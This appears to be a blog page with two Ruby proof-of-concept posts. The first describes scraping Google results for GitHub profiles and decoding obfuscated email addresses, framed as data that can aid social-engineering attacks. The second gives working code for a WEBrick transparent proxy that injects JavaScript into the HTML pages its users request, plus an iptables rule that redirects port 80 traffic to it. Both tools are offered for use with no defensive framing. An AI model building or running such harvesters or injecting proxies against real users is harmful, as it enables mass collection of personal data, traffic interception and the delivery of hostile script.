GitHub Email Crawler
A small proof of concept to harvest email addresses using Google, Ruby and some Sunday coding.
One of the things GitHub discloses (if provided) is the user's email address. Besides that, it also discloses information such as full name, website, location, etc., as shown in the image below.
Taking advantage of this, and of the fact that Google stores the crawled pages, it is really simple to search for GitHub profile pages using a query close to this one:
site:github.com intitle:Profile
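As a sketch of how that query could be turned into a results-page URL, Ruby's standard `URI.encode_www_form` takes care of the escaping. The `https://www.google.com/search` endpoint, its `start` paging parameter and the `search_url` helper are assumptions for illustration, not part of the original script:

```ruby
require 'uri'

# Hypothetical helper: build a search-results URL for the query above.
# The endpoint and the "start" paging parameter are assumptions about
# Google's public search URL, not taken from the original script.
def search_url(query, start = 0)
  'https://www.google.com/search?' + URI.encode_www_form(q: query, start: start)
end

puts search_url('site:github.com intitle:Profile')
# prints https://www.google.com/search?q=site%3Agithub.com+intitle%3AProfile&start=0
```

`encode_www_form` escapes `:` as `%3A` and turns the space into `+`, so the query survives intact as a single `q` parameter.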
After that, it is just a matter of extracting each profile URL from the results page with a really simple regex like:
response.body.scan(/"https?:\/\/github\.com\/([^"\/]+)"/)
This should be followed by a GET request for each and every profile. It is worth mentioning that some email addresses are encoded to prevent simple bots from harvesting them, but this is easy to bypass, since they are only URL-encoded:
require 'cgi'
text.gsub!(/eval\(decodeURIComponent\('(.*?)'\)\)/) { CGI.unescape($1) }
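A small offline sketch of that extraction step, run against a made-up snippet of result HTML (the sample links and the `extract_usernames` helper are hypothetical), shows why the capture should stop at the closing quote: a greedy `(.*)"` would swallow everything up to the last quote on a line that holds several links.

```ruby
# Hypothetical sample of a results page; in the crawler this would be the
# body of the search response.
SAMPLE_HTML = <<~HTML
  <a href="http://github.com/alice">alice (Alice Example) - Profile</a>
  <a href="https://github.com/bob">bob - Profile</a> <a href="http://github.com/alice">again</a>
HTML

# Extract the username from every quoted http(s)://github.com/<name> link.
# [^"/]+ stops at the closing quote (or a further slash), so several links
# on one line are captured separately; duplicates are dropped.
def extract_usernames(html)
  html.scan(%r{"https?://github\.com/([^"/]+)"}).flatten.uniq
end

p extract_usernames(SAMPLE_HTML)  # => ["alice", "bob"]
```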
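To see the decoding on its own, here is a sketch with a hypothetical obfuscated snippet (the exact markup GitHub used is not reproduced here; `SNIPPET` and `deobfuscate` are illustrative names). Only the argument of `decodeURIComponent` is unescaped, so the `eval(...)` wrapper disappears from the result:

```ruby
require 'cgi'

# Hypothetical obfuscated snippet: the address is only percent-encoded and
# would be decoded in the browser by decodeURIComponent.
SNIPPET = "<script>eval(decodeURIComponent('%61%6c%69%63%65%40%65%78%61%6d%70%6c%65%2e%63%6f%6d'))</script>"

# Replace each eval(decodeURIComponent('...')) call with its decoded argument.
# Note: CGI.unescape also turns a literal '+' into a space, which
# decodeURIComponent would not do.
def deobfuscate(text)
  text.gsub(/eval\(decodeURIComponent\('(.*?)'\)\)/) { CGI.unescape(Regexp.last_match(1)) }
end

puts deobfuscate(SNIPPET)  # prints <script>alice@example.com</script>
```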
Once we have the profile pages, we can start gathering email addresses from github.com. Even though this is just a simple proof of concept, there is plenty of information that could be gathered to aid different types of social-engineering attacks.
Anyway, after a few minutes I had a really crappy and simple script that crawls Google and finds GitHub profiles in order to obtain the disclosed email addresses.
(As I mentioned before, this could be expanded to harvest much more profile data.)
Enjoy !
WEBrick Transparent Proxy + code injection.
I searched and searched, asked Google, Yahoo, sarasa search and pretty much everyone else I know. Everything I found was incomplete, poorly explained or off-topic. After many days of looking I found a Japanese site; I did not understand much of it, but after running it through Google Translate I was able to check some code and learn how to capture the response body.
NOTE: As a word of advice, this situation, where only Japanese sites have the Ruby code, has happened to me several times before with weird and undocumented methods or libraries. So it's always worth looking on google.jp for Ruby code.
You may ask why even bother writing a transparent proxy in Ruby that is able to inject code. Maybe the answer is just that I wanted to see if I could do it.
I decided to build my PoC with WEBrick, Ruby's standard-library HTTP server: simple and lightweight, among other things.
Simple Proxy:
The first thing I usually do is check the official site and the RDoc for the library. Unluckily, I was only able to find how to set up a normal proxy and work with the request.
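require 'webrick'            # on Ruby 3.0+ install it first: gem install webrick
require 'webrick/httpproxy'

# Plain forward proxy that prints the URI of every request it handles
a = WEBrick::HTTPProxyServer.new(
  :Port            => 8080,
  :BindAddress     => '0.0.0.0',
  :RequestCallback => Proc.new { |req, res| puts req.unparsed_uri }
)
trap('INT') { a.shutdown }   # Ctrl-C stops the server
a.start                      # default ServerType: blocks until shutdown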
Simple Proxy server.
Fixing the URI:
With this we can set up Firefox, Safari or any other web browser to use the proxy on localhost:8080 and, eureka, we have a proxy that prints out the unparsed_uri of each request.
In theory this works like a charm, but wait. If you look at the request, Firefox is sending the following:
GET http://www.sarasa.com/ HTTP/1.1
...
Browser request using a proxy server.
Normally, when a browser requests a page without a proxy, it uses HTTP/1.1, names the host in the "Host" header and sends only the path:
GET / HTTP/1.1
Host: www.sarasa.com
Browser request.
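Having said this, here is the first wall I hit, and something that was undocumented: how do we turn our proxy into a transparent proxy?
The answer is simple: let's modify our code and rewrite the request. When traffic is redirected to the proxy transparently, the browser does not know there is a proxy and sends the second form, while WEBrick's proxy only treats requests with an absolute http:// URI as proxy requests. All the information is there; we just have to rebuild the absolute URI from the Host header and the path to fit our needs.
Before we start, we should know that req is a WEBrick::HTTPRequest. Knowing this, we will do a little monkey patching to add a new method to that class that lets us replace the request URI, and call it from the request callback.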
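The rewrite itself is plain string work. As a standalone sketch (the `absolute_uri` helper is hypothetical and only assumes plain HTTP), it takes the request target and the Host header and returns the absolute form a forward proxy expects, leaving requests that are already absolute untouched:

```ruby
# Hypothetical helper: turn "GET /path" + "Host: example" (what a browser
# sends when it doesn't know about the proxy) into the absolute form
# "http://example/path" that a forward proxy expects. Plain HTTP only.
def absolute_uri(request_target, host_header)
  # Requests from browsers configured to use the proxy are already absolute
  return request_target if request_target.start_with?('http://', 'https://')
  "http://#{host_header}#{request_target}"
end

p absolute_uri('/', 'www.sarasa.com')                       # => "http://www.sarasa.com/"
p absolute_uri('/a?b=1', 'www.sarasa.com:8000')             # => "http://www.sarasa.com:8000/a?b=1"
p absolute_uri('http://www.sarasa.com/', 'www.sarasa.com')  # => "http://www.sarasa.com/"
```

Using the raw Host header value (rather than only the host name) keeps a non-default port such as `:8000` if the client sent one.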
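require 'webrick'
require 'webrick/httpproxy'

# Monkey patch: allow the request callback to replace the request URI
class WEBrick::HTTPRequest
  def update_uri(uri)
    @unparsed_uri = uri
    @request_uri = parse_uri(uri)
  end
end

req_call = Proc.new do |req, res|
  # Redirected requests arrive as "GET /path" plus a Host header; rebuild the
  # absolute URI so WEBrick handles the request as a proxy request
  unless req.unparsed_uri =~ %r{\Ahttp://}
    req.update_uri("http://#{req['Host']}#{req.unparsed_uri}")
  end
  puts req.unparsed_uri
end

a = WEBrick::HTTPProxyServer.new(
  :Port            => 8080,
  :BindAddress     => '0.0.0.0',
  :RequestCallback => req_call
)
trap('INT') { a.shutdown }
a.start
Transparent Proxy Server.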
Injecting:
Well, a transparent proxy is cool, but we could do the same with Squid or some other product. Let's take it a little further and make it more interesting by adding an inject_payload method to the response class, WEBrick::HTTPResponse.
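require 'webrick'
require 'webrick/httpproxy'

class WEBrick::HTTPRequest
  def update_uri(uri)
    @unparsed_uri = uri
    @request_uri = parse_uri(uri)
  end
end

class WEBrick::HTTPResponse
  # Insert a <script> with the given JavaScript right before </body>.
  # Only plain-String HTML bodies are touched: newer WEBrick versions may
  # stream proxied bodies through a Proc, and compressed bodies won't match.
  def inject_payload(string)
    if content_type =~ /html/ && @body.is_a?(String)
      @body = @body.sub(/<\/body>/i, "<script>#{string}</script></body>")
      self.content_length = @body.bytesize  # keep Content-Length in sync
    end
  end
end

req_call = Proc.new do |req, res|
  unless req.unparsed_uri =~ %r{\Ahttp://}
    req.update_uri("http://#{req['Host']}#{req.unparsed_uri}")
  end
  puts req.unparsed_uri
end

res_call = Proc.new do |req, res|
  res.inject_payload("alert(\"P0wned\");")
end

a = WEBrick::HTTPProxyServer.new(
  :Port                => 8080,
  :BindAddress         => '0.0.0.0',
  :RequestCallback     => req_call,
  :ProxyContentHandler => res_call
)
trap('INT') { a.shutdown }
a.start
Injectable Transparent Proxy server.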
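The substitution at the heart of inject_payload can be tried without a running proxy. This sketch (the `inject_script` name is hypothetical) applies the same idea to a plain string and leaves non-HTML content types alone:

```ruby
# Hypothetical standalone version of the injection: put a <script> element
# just before the closing </body> tag of an HTML string; any other content
# type is returned unchanged.
def inject_script(html, content_type, js)
  return html unless content_type.to_s =~ /html/
  html.sub(%r{</body>}i, "<script>#{js}</script></body>")
end

page = '<html><body><p>hi</p></body></html>'
puts inject_script(page, 'text/html; charset=utf-8', 'console.log(1)')
# prints <html><body><p>hi</p><script>console.log(1)</script></body></html>
puts inject_script('{"a":1}', 'application/json', 'console.log(1)')
# prints {"a":1}
```

Because the body grows, a Content-Length header copied from the upstream response has to be updated to the new body's byte size; otherwise the browser stops reading before the end of the page.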
Last but not least:
Well, there is one more thing, but this happens at the operating-system level: we now want to reroute all incoming traffic for port 80 to port 8080, where our transparent proxy is listening. The following example shows one possible way to redirect HTTP traffic, assuming it arrives on interface eth0 and the proxy is listening on port 8080.
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
Now we have a transparent proxy in our hands, capable of injecting code into the pages its users request.
Enjoy.
